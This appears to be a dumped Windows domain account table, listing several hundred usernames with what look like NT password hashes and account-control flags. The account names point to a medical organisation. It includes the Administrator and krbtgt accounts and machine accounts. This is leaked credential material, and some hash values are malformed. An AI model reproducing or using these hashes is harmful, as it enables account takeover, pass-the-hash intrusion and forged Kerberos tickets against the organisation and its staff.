3623 habjerke 7e8c84c917c9fc038963a3ce93216e85 66080
3624 nmburrows 53e1a7c692df47380ac6b10fa929d619 66080
3116 lbade a42517c0b074323ed7551e7843e06a6a 66080
3622 rasamaraweera 53598c7cef57dbbe022cd6c3a060dd62 66080
3618 cknapp 8d44d9d97a7eb51453c9675c27f77d58 66080
2057 amueller 1715ffc1cc289374eac3d026d2212729 544
2055 kherness ee1357a73b9570c7417e92a6c42108b2 66080
1865 jsanders 7bbe92186dfa6d83ff80f86ea5432bae 512
1854 drbrett e61249c7e0f735af6455250d047454be 66048
1765 drgallagher 39a6ccd7d6d2babdd11650ca3e4f2e7f 512
3125 sreilly 23ae101070bc0586361647a114e924f4 544
2020 teevenson 21cd92559f2f6777c392238631bfa2da 66080
3626 svaishvav 55d497470255d27142997ea1a14440 66080
3627 cwwieland ae28fff64a4fe592611d190f19102983 66080
3625 lweyer e3e7eee1ed76769a23f471ac120c1e06 544
3124 nakunz 9dbc36a0c8329bd74432d16fc2c6bb6e 66080
3129 kbbitz 97e8e354617e6ee997afc476e63414a8 66080
3127 djepson b678ccaaaf35cbc0abfca452ad58a228 544
3131 bjvermeer 4c62227a61ee486a68c7a9669dde29c0 66080
1921 emseverson 4f44dedf2fde9618daac909e19bf86e0 66080
1349 gpnordahl 2fd4028cbf019e74c73561a8b38842a9 66048
1657 jlhoxibi 0d83157bb7516b53caefc4ddb26cb3a8 512
1837 jattarian c351b623e6b9a8644df6e0306668be3a 66048
1226 drpettit abc9339628f25497f82bff321aef2adf 512
1424 drlazzara 621cbce749b9e2d0d3932c569570af16 66048
1354 mhstrosu f101a562f2474a7ebf2c882996f78dfe 512
1414 mmalterud 252f40027953f53db8d5355fc4e623f3 512
3134 drsmith f53cbf927e94b3299e739c5bd5a68a82 66080
1383 drgundersen 6507e1a9ce1074d7033ace38472930d6 512
1431 rakhan a071fbf41deb4a041253d28e8349e11a 512
1255 mjblank 3a9be57e8803c1d632a52665e8886922 66048
2063 Dmsoderberg 1e27ea1d77323210ba372ef48bc2435b16 66080
1371 lindaanderson 99bc030173d93dd089f0fb00f663a592 512
1936 kdkaste 979cf8e3376ea416e5e9e247441f145b 512
2007 emurunga 68859a1fae623d63c1afb7f4722ef25e 66080
1367 drmcdonald f0e5ca8c0726e882a6d08ee2fecf6010 512
1494 bimanoel 53ced4ca69f53350ac0a242037b42d3c 512
2062 mlmcclure c724392f7594a12f52a3e2ae3f09ed93 66080
2059 sotto 556c52008436c466b802843877ce5b77 544
1895 lwatkins 335c8f6f374ddbb6942e65e09dbfba17 512
1464 stesfamariam c8ba09ade5d018958a24e66aab7eb381 512
3615 sdhansen 3be1b8bc507e147aec8fa1c8c3255ad1 66080
3133 ebibich b418813395857c8dd626946ca72aa6d 544
2060 cschroeder 848c5db736f59224b6521f83de457008 544
1316 njohnson 71b43a8306d1bb60e84a0bc2400a5a21 512
3126 krwannemacher 02ef3299dba8d6b10273d2ec377c451e 66080
2051 lemolter dc9515868900774b69ae6764f74b03d7 66080
3130 mfradet bfec4f416bd9c687473afb442cc89786 544
2066 amusolino 564591a18751d61a058a8e12a9ea2b3b 66080
3140 agqazi 37c1acdf538c07ebbebadb2e013b65e1 66080
1254 jyrkwa c49ad9b094c1e2e9070a48b48b50c40bbca 512
2058 mehouge 21ed21c51ceb7b847881ee01b0f2f0b2 66080
1390 jlnuss d7d4080754aa8e52b97190de07090957 512
3630 hrose 1a7205abe0fafad537d6981673923a5d 544
3128 bgeorge e6cacfc8e3db00201d49bb163118f601 544
3139 cjfisher ede2b6f6f961d6a7a14181af90e0391e 544
2073 blsolheim 5d20da4120415a68bc3ffbe1f00551f4 66080
3632 barettig d6a8135ba862cf03dd064ecb505e1c98 66080
3115 sadahlen d79359164379bec437474a4d9d8944a0 66080
2074 drpauley 112602cfb846fe1795c14c68909dc678 66080
1166 pmpetecc 46e0ad709c50659fc59b550ed7f232f4 512
1365 mdmartineau f8ae494e75ede253bcc67de16fa28e03 514
3142 llcodner 50c1106bc8acb197a255aac5e721709c 66080
1541 qualcoord 0354dbb8b376dd32094b1aefd044d37a 512
3108 ztariq 4705d690f3cec55eaf97c339a69e71ad 544
1173 mjweinri 010f4c58fb04b3ef9b0dd6fbeaa9d33d 512
1682 ljoelkmu 3310515e0a269685d1f2c706cb1a84b8 512
2071 mchris c549a587fc362d601d0a52492a4f9ad3 66080
3148 kljohnson 54f315b20794c3d5f3eb65cef37dd955 66080
3150 kjwalters 0bb84c1adf6c83e25de00741092c319d 66080
3151 nsfroslie 7b759a3f19d6ffe661a629155aec8266 66080
3153 rdcampbell 9ddd27701fca52a3ec319fb2a5c34466 66080
2076 aregan c33f96e046365baab7d0a02204d42cbe 544
1491 slmcgaughey 200a4de5f8bd14c46d65bc8ad1c6ca06 66080
3106 pacs 8846f7eaee8fb117ad06bdd830b7586c 66080
1514 lbdraxten 4d91441f69a87232486af44a6b08f253 512
3633 knelson 03d0143159401abee5a528c0dce74768 544
2080 Cayarke a0316a9f9330960ddad527b32f5af0f4 66080
3638 ljniesche a0abcb477aa06118d0ebe413532cec34 66080
3639 tmwatterson 76aa8428553737150243c4c963d569fd19 66080
3637 jmotto 3a3c6bebeeec017dc900caeb7ccbfecdb 66080
2077 svaishnav 55d497470255d2714299777ea1a14440 66080
1293 madillon 1ff36f57aff1d5db8800d2c785a0cae0 66048
1764 vrdillsu fac2ef7f50e774a2e41df12dbc505099 512
3640 dkgrefe c7ed39affecbc90fd91a1abf68edda0b 66080
1686 tlanderson 55150fc03adda47232d11fa83533d995 512
1984 aleimkuhl cbcd954052a0dcd5384e34f3353a99e1 514
3641 jlheuerman 5281ff4763d8fb598c4266868eb8a7ad 66080
2088 cmmartel 5d1bc7b455964b6f5ae4317b6fb3b9f1 66080
3146 wdduphorn c3b2e61a8a7e9328a07c93457f636b0d 66080
1820 nronnrl 19ad78367f61ade03434329df699aafc 66048
1773 tammimark 9938969a3e61da4b7762cb0b28e52eaa 514
2090 lmmilbeck 51aa35e3c69e3af7a8cad0f55e11d8fb 66080
3159 tjstudor ecdc539913db29572a6db500a015789f 66080
1942 nmnelson e63625ad3dbb41c2de8e7f25b5a18d69 512
3155 mzarbok c8e58daf37662e53ad521414519da823 544
1358 hjanderson ba2f17c9a6927eebe340a25d57fc63a8 66048
2048 aghohman 9649dda66c04c694863b38c02a6e3d3f 66080
3158 kmeichten d20236d18fdb68f0bd26824a1d687fbe 66080
2081 jdavis d9c08ff5332e2c79e582e88637cb260b 544
3642 cgordon 51457260c1e3b9e4b265a9201cdfd713 544
1757 kkstensu 0076dcfb228b7cf51861624948f4a2a5 66048
1925 slmontella 339a9f43281e1d64712917d8b34ab34e 66080
3154 skeller 4857e8c54f2cc52b41f268533403988c 544
2092 sburke a3742094f040007d503a077f3b7b18a1 66080
3636 pbaronhabberstad 5b53a73bf553fcf9374db33be0cc7fa 544
3141 vandvik cc5077e4d91fc974fa62d8629e9fba7a 66080
1799 alnelson 7e003487c37a3874283424b645d18668 512
2079 knstorey 1027f9d7f556dab44d720831e603bcd9 66080
2095 plhed 23e1cf54a3a8db2a8669d4e12a0a8241 66080
2094 dlundby 6b2a35a602186a65973c02150fb70bc9 66080
3161 klillquist e910bee2cd95a3cfabe052189783b1d4 544
1702 wynnkjhs aaa952b4f92018f800e5c19aa9255a6f 512
1706 slleroy 3f7684d51be0a9a78cd7e7a36c7e297a 512
1666 j_beyesu b5ef8bc4d492c5e96fd3ac3d538502bf 512
2083 kbressler 6177b8ccd78e74cd0e23f2121a0f95ca 66080
3156 rbeech b2c06077f1866a3ff2f0e30120d194a9 66080
3648 krubink fdf417ac259ab089e4fdb06269ff93ce 544
1277 djmoe d8a0a68924b7b8dad11e0940ee72a147 66048
1980 NWKS14$ ff080dfeb5a55503cd8129caeac080e4 4096
1521 NWKS13$ 8114caf690393938e8beead4db4c7bab96 4096
1420 aedraeger f23c5c919a07dd7cb86a9d9dab192ef9 512
3164 lmkeller b7ed01f474587ed397b553a566e0239b 66080
3165 drtest 787e222e7b428a71b895c3d39f1ca222 66080
3651 eripley 71b43a8306d1bb60e84a0bc2400a5a21 66080
3652 hsolo 71b43a8306d1bb60e840bc2400a5a21 66080
3653 jsparrow 71b43a8306d1bb60e840bc2400a5a21 66080
3654 erdoctor 7c53cfa5ea7d0f9b3b968aa0fb51a3f5 66080
2000 acbabb 64eaf056b0f7c0f0fc6951ce71e6d6c9 66080
1828 sjpeterson 16497f15560fd9fa371c158b47241b66 512
2068 rluong a82f44c197d723aaca24812e8c6625c1 544
2101 testpacs d44c1eeef473921cc43b079f4a3c1412 544
3168 sclaus 64eaf056b0f7c0f0fc6951ce71e6d6c9 66080
3169 bbee 7c53cfa5ea7d0f9b3b968aa0fb51a3f5 66080
1109 aliedit a80fdb8db842a99d87ef3d857f8ddcf1 66048
1159 iccumgr 544e16f0bedca7fe5b2edb739a0f3111 512
1505 erdoctor1 b14459797d622853569db78c33b43474 512
1241 drtdlarson 5202215389406b0eccb2f1f029c57e9c 514
3166 athelen 2df4f3ee1b4faea233b68268ae983329 544
1574 VMUPGRADE$ 86bc8ae462a55843fe67520b11523d58 4096
1553 brhills 53c6e7c8b0150f36b797ad32d62abc28 66080
1661 reinasor ccf69751cc4a4f8e318b0df52947ccc4 512
3656 mbravo a9bcd52c5198a83a66fe224315fc73f 544
3163 aabliese c4fd4d6e475ab961362ce4ee231aca2b 66080
3109 kjstenger 8ec37706d3de0518b3220192dfc58061 66080
1805 jegervpt 701a630ff55b9ca5c8639cfa39020564 512
1324 lindasander e2a2964ed651c0f7ba4ec81dd01e02aa 66048
3650 khowell cf561634a85d8f5597446005fe7fd8d1 66080
1158 m_rittcc 18bf1995a1d949b7ef9741892266efc5 66048
1118 WSERV0$ 9da2e9383bf4520440d92ac54ac8a4d58 4096
1745 lljennbi f6d4b79198861b1be247d463634341c6 512
2042 pjzimmerman 84ce0bce7008f217cd687f3e5126eeeeee 66080
3614 badahlen 75222701b0d398c68117ca403f205478 66080
1174 aanelssu bad82b030b9c4842f80656a128a76b67 512
1758 hmneulsu 78e277034ec4906d2525b079d4c5749e 512
3174 danderso d4e7dcc95e80467c613daa02cd83b446 66080
3664 ewestergard ba4aa5e94885b31904af6af6c1bf4f39b11 544
3173 csylvester 55b7d520ed567ed59988a54f20078de6 66080
1943 lmweiss 706ee8e0530f19256d86b5457ffa93d9 512
3172 nlstrand c4300f168b4a6ba2c638ce330c4b4a0d 66080
1282 jillgeary 2f913a2a114e727390a6aedc67024b8b 512
502 krbtgt 0743a7d1387b8223ea5683c913ff9e33 514
3661 bgesell d18a344ee8d2bd0a7cf2c10b17a1ee02 66080
1889 hmasmus 62dbe4c921ea6d6f5f412b982405a944 66082
1317 kverjlsn ab6bf500d58072acd7d09530dce4f6b 512
1922 degrunewald 5d773ea1aa7e3d4e47fc15750e8084ad 66080
3658 rloepp c88b55448a90898be0d8eaca3e7c9961 544
3666 ceaves 3ea18c0fbd5c65cdc2b3cb180f99aa0d 66080
3177 jlwilcox 633d364df0e81ee7ce9de549fc9b0088 66080
3628 MRNWKS14$ 3e00e4aae6f1cf0133f66a3b70959413 4096
3178 dmbartels 3cd77333d81bd637234a19ac76ad399b 66080
3181 nraman 366b8b4a49c10e7441fc1b241868a2f2 66080
3635 bdelage 2699a0a42951c71f032da1b9e2bfbf05 544
500 Administrator a80fdb8db842a99d87ef3d857f8ddcf1 66048
1523 tbmatheson 1f776ee6e96b208f8925b03cf11994e8 66080
3660 cfricano 6bbcb20afde0d6b67e6761bb9a7e280 66080
1926 drbarker f990ee0e10ca11e126d7e7001181c0dd 66048
1477 levranz 08a4a2727a1ca671c9260c85d6debc46 66050
3674 jhansen da59c62be282a2b3a207d663eaba129d 544
3676 bsundar df4e2753ded8ea9d3982d6b386196c95 66080
3186 slmcdonough 19019865c9627db050d3debc6d068d59 66080
3187 sbkriegler 51a6eff0344e71a73ba0465acba0dc02 66080
1219 drmagnuson 2b89a35ea806d441361b86e8928f0069 66050
1884 drdellison 7b3ed86168a343943a860db9fd43326 514
1617 radmgr c6ff3f57b90e71395cc63de7b5b80086 514
3104 kkkemper bfe2bdf62b5d348db2317060791183ad 66082
1625 dennjxr f5c1703c283b2e86061e499e9add725c 514
1867 kbitzan c9ea8a405ddbf37e55ef0fa1fc5e7062 514
1635 kjjohnxr 50a17b4631d880ab69c0bff939184e1e 514
1643 llsander 71b43a8306d1bb60e84a0bc2400a5a21 514
1396 amvoorhees 71b43a8306d1bb60e84a0bc2400a5a21 514
1447 llmarfell 382caba988ddcb6b0e7d433b44168b60 514
3110 abthompson 752c4e688d32292b2369a20766f97fe9 66082
2049 tjpeters 661245aab3a2da1cffb9296f4c1bb2d1 66082
1648 thomrmxr 22daffebc9951232db7c2255367541f4 514
1243 bmc 51e4a88e2b207731dfde221c1aac6433 66050
1232 drvan 6198afcefcf76d5aa8ed5a0231f7c4c6 66050
1235 krw f53551d10c915a704f27bd094983b4a1 514
1399 rapearce f5fca4da57abb3624aec5ca9711fad2e 514
1869 drpinke 928084d464e8e2b46953a287d34603ce 514
1901 vkapoor f08ad0acd589ac2d8077cc6be3823b55 66082
3655 drtillotson a14701c2fc0c888805c49abedeab76c7 546
1259 cardiology 0909df2be620d82633dbe6df2a14e822 514
1484 drriley efd9ec287d222a56e5c58fbb5e0c00b3 66082
1511 jkkaspari b68960c19bebf90e2519ff493224cb5d 514
1510 dmspierer 4a842475a181664261effe96a0294ffb 66082
3683 lrhtest c0c14d4369392a6c8984e135341a3e35 66048
1340 akdrouillard b999e773055362a90e066168697f34b1 512
3157 emrabie 84ffe7a05489be6b159d1be4f28d8654 66080
3188 testrad01 7a21990fcd3d759941e45c490f143d5f 66080
3136 arwilliams 1c8a15dc2cf39ad724ecffa34c51df22 66080
3189 kccoleman c53f411c5c25205eb6e41cf532f15f3 66080
3192 kmmuckenhirn 08e79d731566b3e02ee6567b67e06bc2 66080
3193 tlheckman b4fef99bb054df27f3155fb289ddbb09 66080
3185 lglidden 1c74a011d13341346553b4cab99c5f4f 66080
3688 tcarpenter 6dfbc391f973e9edae3d284e217ca305 66080
1162 jdfransen ac3b03f29ce9321c5dc6505ecb69de3c 66048
2085 mdborowski 9d5c0d7a29ba9ab4e8f5ea70731742 66080
3690 jtreynolds 740500dd0c0a4113cb30053c083016d0 66080
1322 jmbernsn 82f1948a684b1ca3acf28319c5a8d011 512
3679 kglasgow 990c521adaaa5e4addf2c9a76018315c 544
3691 mhudalla 753e11fb4f4c64d36d3ec29df1c14b33 544
1829 alerickson 6bd1928a5bff3e98e4e5883d182ecfa4 512
3198 sbeving 395aad84da74aa6f8e56c3461b797315 66080
3200 kpeterson b4d06b8670a68c90ad1b704bbd3fa4a6 66080
3203 naolson e9beec3ca6b473c4e656c1ef9c62a18c 66080
3204 jschmidgall 2e00b6ec17a25e579e9d78463d556549 66080
3206 mdanelke 58d267031108d7b9089fb94f236785c8 66080
3207 cblascyk 9c3b90b15f00f481b94aa164729a4d9b 66080
3208 tbengtson 5b91192b86e5e38304e03cc463c2688c 66080
3209 bkipp 2f2b9a59122f528ae9dab4919eef021a 66080
3210 jstock 04a4816d0d9c50ed5d81967e4472b2 66080
2069 ssnordby b87873f5c36e099a1dd70c2997ee7634 66082
3699 nchelliah 99d18a5640490c029a99461967318196 66080
3700 aathey 802b86f643c99aef0d2ffb945005e482 66080
3121 blee e5291f1449f66686a1def83daa759f66 66082
3706 belee 80b039cd64077f54d6a6c87b76e5cf5f 66080
3708 phaberer f9c143be0041861bb993f39f78df0952 66080
3709 jeandrews 47b29e7297e1a2c493882cb5d1acb5a6 66080
3717 cwarde b97536d0b9013d6c80f2e51d85a6a6ab1 66080
3718 mwendt 0c9dc5585aea4f3f673fad73bc01b5c2 66080
3726 sdenardo 7f77eaa05b49ccc5de2152719fa83158 66080
3728 amiller 7af9829b5e7a480432bbff19ba1a8293 66080
3707 tclemensen eebccdc0b2cb0f4f4e7312f577e3e823 66080
3746 khyttsten 7a21990fcd3d759941e45c490f143d5f 544
3749 jlolsen 7a21990fcd3d759941e45c490f143d5f 544
3714 bmoerke 274194e661d6b4a1f3f4b4395f2a8e11 66080
3705 jhotvedt bddfb254e68978d750fb3b11c88980c8 66080
3747 tschmidt 32ed87bdb5fdc5e9cba88547376818d4 544
3745 lguttormson cf773e1bcad4cfdcabbcc2a1773e8dfa 544
1569 lmshol abc4e928d4b6656cdc2f50d7db91658d 66080
1961 menosal 7bed3d262008d701ebdf6f192f4ecb85 512
3211 jzimmerman ab0361df3905918f506e1ef81a676068 66080
3732 enelson fdcb937082862fec68eb27cca0230cae 66080
3743 kquarzenski 368d1f874ec963f51c3f37bd7cb27728 66080
3217 jradermacher 8e25fca7fe670a1ef3f7d33565702c18 66080
3216 jspaeth 30b6725b7f206dfef38afd3b26cde482 66080
3737 rsticha e2d1252eb58c355cb52d4b94a5716122 66080
3731 dweigel 9df1fc4471da9920da645c1e1b0193a3 66080
3742 amanderson 6838329ad037fab10150f471aafa16bb 66080
3729 jbrand bbec3aa8fccb44beb9658bebd230812a 66080
3738 jandrews 7713e54d6149c19e6bf0b863d7a5829a 66080
3736 abalgaard e02141e877cdc6f0a76212d68b7d1185 66080
3741 lbeebout 751d0a42c7bc3e9728c27852fb7574b7 66080
3730 pdale 082c854cedf9d48adefdc6ad9e5e30dd 66080
3733 tdudley 73c7d1001e98494ff50090e420968de9 66080
3734 sfeierabend 0c20349b27b0d1e70091e812ea5d3e78 66080
3740 tkay aa0cbfff234b8868e3d0e8ecaed1fb49 66080
3215 mkunstle 869344f72de1ad848b5981dcb99d19cd 66080
3739 tlindley c13ecf11cdc215c8060aee2dc9daa7b3 66080
2039 mtorres 789c1048398e3c875f62415cbedafc63 544
3194 tstrates 01f6a51f5ea0f3fa147081938fe17abb 66080
3724 jlohse f4f6de46d8493fe763742c4ddcada732 66080
1839 bjonken 1455893cf488171aac6bdf8f38806f02 66048
3662 bbagheri 85d1b9ed688976d60bca02746a0ea24d 66082
3716 hdavids 2f192067980a1fa183a4edbcf7f88109 66080
3720 aseger 050324abfdd09e698f545ef1d7669076 66080
3751 pjdilly 1a8d34d359c633b9d2b54b20c908dcad 66080
1810 marqmlpt 82532f6826ab4683746e6c899f1d2c26 512
1957 cldahle 1b269f78c8f3b1b38ed363de625b4be9 512
3686 aredding 8d7f15bf43c1aeb699020e2ab4f943a8 544
1928 nlbertram 4802cdb907b9b5e97a4dbb4892b80c7b 66080
3748 bmoore 03096f8607f2f99d8e56d9b63965a2cd 544
3750 jmorris 9abbe5859bdea767528b3ee5e2ba3990 544
3704 cbenson 7561c8f4f9d6f6d9a68a1df57f12606c 66080
1167 r_vigecc 836198353f3bd28c37c6b3656af4d287 512
1519 kjandrews 72689568cd6b52990919f71401f9fbfb 512
3703 lhansen f9e37e83b83c47a93c2f09f66408631b 544
1161 a_evavcc 3227e9a3a0e50f03d995e50dbedc77e9 512
3685 bdehaven c242092bfeeb43b08e7225036b9f6795 544
3182 rschulz 017bc067b2691fa3c1186f14f5c544ba 544
3218 nverma 24f6e3c0b4d60f1fb157fbb057ff6478 66080
2045 smsampson 56d5c133f3ba2b2c8b59b87bce21d4ef0 66080
1827 kugllmbi 46eb00e79da62c3d913ac8cabd39633f 512
1755 pahlmebi 59f20522158f90a6507a5a68450bf8d8 512
3682 drbratlien 6af0a5199725de2dda9244426eb13dfd 66080
1811 symenapt 7c2775f5f46ca6772ff6feda5a15c39d 512
3191 jbheckman 34e66be24b6b3e3018ba4e8590e8ed76 66080
1286 karaaxell 0a3c4deb4606ffc73b0f3db36e73d007 512
3678 asoutor 84b5ce26e9c3c758b60b796381e11a0a 544
3673 cclark 45fd4325cf7526f08270d6d95ec745e3 544
3744 kimjohnson 7a21990fcd3d759941e45c490f143d5f 544
3219 kijohnson 4aea5ff9f308db07dbb3e10c8f59c1e3 544
2099 drjelinek 2881d5cf74fc982d10174434c69d37ca 66080
3221 msumner 0a36ea273622bb254eab03ad1d2f0675 66080
3225 mbussa 834a01e171c1511ad46f193792ac5d62 544
2016 llhexum e6de2a3a895e2f8442d9ef41dc06ba43 512
3212 crohloff ea0069dfe9ce92a05b99a3f64914dadc 66080
3702 ajensen 65071e8a9f6cd3d347566a45f246cdb1 66080
3224 kbuczak 58a478135a93ac3bf058a5ea0e8fdb71 544
3687 tnapp 7ded9cf2a15278db249f4dd0c5c5b2cd 66080
2082 dsquires d8d5d149c6286cedaec6e1cb293d375c 66080
1997 kgogbogu aa78fcafaaecbcdb90b208ac4b5faf94 544
3645 bjlaney 84801213b740b81e9ca60a646b1e0a3f 546
1215 dll 013140f7ceff192b451eaed83b7dbfe1 512
2010 rksundby 2f1bc14d3d54d550a2160ea8fc7f363f 66080
1880 ajfalck b309082b1f3269e0cdf56b71b97e6bd5 66080
1315 lolljdsn f9371be7906002d68a9e1c3da64f4ed2 512
1966 elpeterson c6b2f58f726188912e7e4cc95a787a0f 66080
2064 tleliason af61440f9a461322e1c2fc7b5e0c28de 544
3145 ahdominguez 8b14ef8a873276d96a2ac0567d2d6750 66080
3680 hnalbert c27545b18e0f7af45fea11a7d272b472 66080
3135 etberro 4a829a41aab63d94d2f7dd252eafdc90 66080
3147 jcjohnson 792508dbd7d9693b9e7ce078e9c43885 66080
3197 jhaley 6cff63abc2d1668b91019e120d418b87 66080
3764 cdnorris 5600599991d0b24ec550ca51e9ea53a5 66080
1964 djorandi 1df0d388ff98dab288ac33cfc9af3f17 66080
3170 kmsawyer 3b8a64c7b0261cd3d4273a71a04b8a3d 66080
3701 jbrevig 0d867ce7ee97500f4a18088077719be9 544
3770 jgmarshall c71cf281c08ba3a2580bf7892ed8a8fd 66080
3232 mlpaulson c26abdba943fc666da80387bbe304f6d 544
1886 drberger 98447d252cce6109736c24cb8c5b2c04 512
2078 hegewaldl 7a21990fcd3d759941e45c490f143d5f 546
3659 tharrison 988a8fe2ccb22a1484a20b1f962a2486 544
1668 adkamrfp f72e3a858debde72f50f85bee53c1a0a 512
3758 dnriley 3c42e6b35fd0a27bbda711eba4bd5fd7 66080
3684 kkaushik 04592e27471e3e1ff0fa3f383da6dcf4 66080
1217 drlipson 71b43a8306d1bb60e84a0bc2400a5a21 514
3235 lnygard 7a21990fcd3d759941e45c490f143d5f 544
1875 jlthunselle e4c329e69525291304a7d2807c89477b 66080
3233 acfiala ea65fb049f698ca1a2a5d94fd13cfb0b 544
1565 lwwaite bd5c7f1e2e11b4c5993670cde347bf4b 512
1641 pslinder 9348c3642f47ada17dcfdc1d7d8eca88 512
3762 hwilson c923157653b773887144e4cb634e53bd 544
3205 cshipley 1d82cf8e1ad54e24787e12d42b23e4e6 66080
3236 crico c0aa220653ba235f1f0885bf5aeb6fd6 544
3776 LRH000955$ 2aa647c303f84b9487ca74d2aa4d1f83 4096
3761 svanerp d743f0e50d195a3b7f57445da256d44d 544
3237 jbauer eab4556003a83e179a149ce6583e097f 544
1445 saolson a3174064e5df297ceaebaf4682a611ef 512
2089 aesax de353cfaeec8601f83b2d658a0ac8561 66080
3780 Tanderson 1b66337b958db181272b0c28092321c5 544
3234 jlkraft 2590913f809b8930b7b7338e56228785 544
3617 sbhaugen 746a427b1b8edbfc6a0320258835cf37 66080
1626 m_dewexr af2d43ceaea484e7871bcb902756b2f9 514
1621 jebeithon 1b1135cb9431cff7b48447d86d0f39ad 66048
3240 jloh 0f564bb6b25912dc51eeb64a9bf30389 66080
3239 mleon b2dc81d287286332b163deb7d993be68 544
1571 Lkgrunew 3b4e6bbb125bb148ad8b0ede912eacf6 66080
1325 cbstigen 5654690ff05f50725ceec956aff0368b 512
3230 kdresow 0e342dc5277c074d71a64e61ae82819a 544
1946 tmdewey 9806ad49e12ad478ac5c3c47b4775a7bad9 66080
3231 mlromslo 9af11b0af4f5c499b1585f7006d3f0af 544
3241 efevavold c721e2a5c9fad69f68d1d9f7233d0a09 66080
3242 dmgrothe 68d158ffe0ae5e8c03893cdcfcdc9183 66080
1707 brunsmfp 2f891514a09b310c5e184bdf123dd635 512
3754 jgmitchell 8cd2209358a8e86b0c7b65e9863f7f38 544
3244 aarosenkrans e89898c83b3b04cc87cf2ba0f1befce9 66080
3245 tthagen 8a3fae86b263434cd7d27c58418823db 66080
3246 lljensen 24cc4a64ec9ea3b23166d44427b96c79 66080
3785 pmhabberstad 7a21990fcd3d759941e45c490f143d5f 544
1759 llpearso d6dc83575443fa81b7b8a484539eb29a 512
1893 mmbarnes cbd188dd7ea8598cefd6533896e6fbd7 512
1202 jea e86e945713819cac1d04720f51e1f7e4 512
1536 djlandmu e181f457342748c4cd09dad958e72b0e 512
3760 pmiller 50ae45132343dd3950795d4ba213912b 544
1710 bmpetemu 4a5d2e77270842ba4d43ab14bbc92ba3 514
3238 bemery b5f84ffe29fdd2ccd34a98a2af1041a5 544
3162 MRNWKS17$ 52f187408f397f3a73b6d514a1101fd0 4096
3777 mstayman 95087e883541e580da2d78a0340288c2 66080
1441 jeprice 0b8557714db41320768a6c8ff3ad8d0b 512
1934 ewolden 1b123eda9c30734c5349be5ab95e622b 512
1624 ldcharxr 10d51136ecae056bd31609d64c39cd91 512
3775 tsofficer db3dcdee7088c54347ecb9d337c6e6c7 544
1297 maryjotonneson 651de33d6cdf9231b43056ff7071601f 512
1180 ajfishsu 4e173f53ea685937facdaccc764bb322 512
3616 sibowman 883657c785794a6c66245708bc0a146c 66080
3782 Kmfinkelson f03cccbdab1380b0c3deebb5a2476f12 66080
3766 lnelson 9fa0ebbf5f3d64d488ee1462baa23e18 66080
3663 ljdingwall a44fbb7283ca381cbacd6d8fefd79424 66080
3176 prhtech db2e2e2db5de660a4e66952e7c340dea3b 66080
3252 ebecker a6564f0d4c7b3e8ec13889ede1d1b4fc 544
3253 sknaus 287d4519e3da6469a4f572378050f56e 544
3254 hwold adc85782b0a540f111f66b48fafaaecd 544
3697 lrapp 5aa11bbfbf48dabaac1b3f618a03af82 66080
3711 wlnyman d0e5676e1f18e67d6e9392ac5887ec2c 544
3778 rcampbell 0188aabf6df8847800e1755889a8fa0e 66080
2075 lkbarthel c9719528f8f9ebd659840786bfcec068 66080
1402 lrwhite 5e5fab4d07e0c0d0df0f6a42dba9fc27 512
2072 mspeterson dc87be1856ba6fd7ed533e27f2a40545 544
1650 welccrxr 78215d449c6f17482b541ea20cba4a93 512
3675 MRNWKS18$ 71a27e0b7f8fab8e51be242bbd34f5f0 4098
3789 grhtech c86c5af58d28542d1947fbcb901a8299 66080
1866 lastoll ef42a7d6774983241a2a55247b96b72 514
2604 kjkemmer 606aa7efd3d9d3c96af8b9219e595cd 66082
3175 lfabel 90153dd7c07d2e412e2670e22b958ee4 66082
1681 kanoyecc 60e698666b0a2b6941a72ac4aff6a4d9 512
3721 khokanson c0aa6268feedbfcc8b2ffef3f072dab 66080
1647 lkthomxr 7bac175452ce652677262dc8009e89d8 66050
3268 tlis 0c5e5cca01119988aded6eeb6d1e5867 66080
1206 drborowski bcae9cf983d6e62c61c18f6dee82a607 512
1905 ajmelberg 27faf911827510ef3f2017aa39f948e6 66048
3765 dpickrell 8fbb36341e774e2e491adbb461695f97 544
3278 dlesmeister 7a21990fcd3d759941e45c490f143d5f 544
2093 mnkowalski 572356a7e037ebd894226cc60900eeb9 66080
1188 pmrundsu 8e6771b224e703dbbd186bcc343c0239 66048
1703 lebuchmu acd35ec2b7ec25a37c8b935a3565b1e5 512
3634 bdlarson a573af9f9250995ceb4d2342e40bd895 66080
3112 MRNWKS13$ 53ba223a954a866b916b68a12738c12b 4096
1240 drmatter 966440c2b1a673166d488f3891a80efe 512
3698 jhoffman b4855825ae580cbd2015e734299642e2 544
3280 TEMP0$ 8252bbf03e3db69e1d872e2c1eb5ec17 4098
3710 bmbeckert a498616fd144dd0681a224d4690eee7c 66080
3122 hmshol 476d0ab3ac09690e864c11e05d371276 544
1165 t_martcc a44772032da791fadc285212cf1912c3 512
3273 spatel 072173c87f28720a583f890ae7559946 544
3274 jcorry 150873b40164b420d7117fe7d4309e62 544
3276 kesse 9b69e8d44bb99f05ffc210987b6edab3 544
3277 dgiannakidis 4468caf7a3f7440bc99a04bd34744e7b 544
1833 jehaarstad 4cbbc36ab7ee30cab782e16ea4270e45 66048
3784 cdcooper 48b214605ef262be9290e474f5271cc4 66080
2038 mccooper 982fccae904b0cf57fcabec3e9cdd0d1 66080
1929 baduenow 655e06636ca0e2682294c6b86d2d41f0 512
1654 n_aslaor d35cab41444ebfa7a8246385a09c82a8 512
1659 blmulvor 17b856dfc50b19e414968a6a2772e34e 512
1573 MRNWKS12$ ae39f114a0924f2b703e5628b5a1f226 4098
3266 lddivald 3de8505c35442ae80184a6c784a4e0cd 544
3787 bsmith 4472910b89492aef53ceb6b420b15f52 544
1835 b_glassu 67f5296cfe35af81a281822f5789cff2 512
3693 mwood 05355201b0e8036a0f80e48d4d4a454c 544
1321 anesmgr 606824736dd2645664eaf79fc31d1956 514
3796 bdfagerlie 6650c25cf1a1a7345926de9fceebdb58 66080
3797 kanikcevich e3a2323f39581fc51aee293e5e50c944 66080
3606 clboyer f92df27b803395ca73751f297872fae9 66080
1748 laandebi cc4e0355850bd035fa09905f53f28aed 512
1428 mdflugstad 73f003f0d842f1f55437bdecc14a3baa 66048
3800 rmassaquoi 5c6cee0597fea0b5a32fe545ed9d8f18 544
1323 tracybeckman 998330048814c2a6e1b121ad0700c1a1 512
3772 pfshol 99e02a0cfe154a568c2f335a1cf41391 544
1450 katlynbockman 5cb6367e176a3a44fd38aac5e1a51d 512
1721 dlmortfp 7e32de26ea37ea0868cee8e8f2632a71 66048
1705 pabaglmu f2cce80cf6e95ddfb8da2fa7c3cfc823 512
1300 mllohse 64f2940a7f7e98b39f40b1c5c769525d 66048
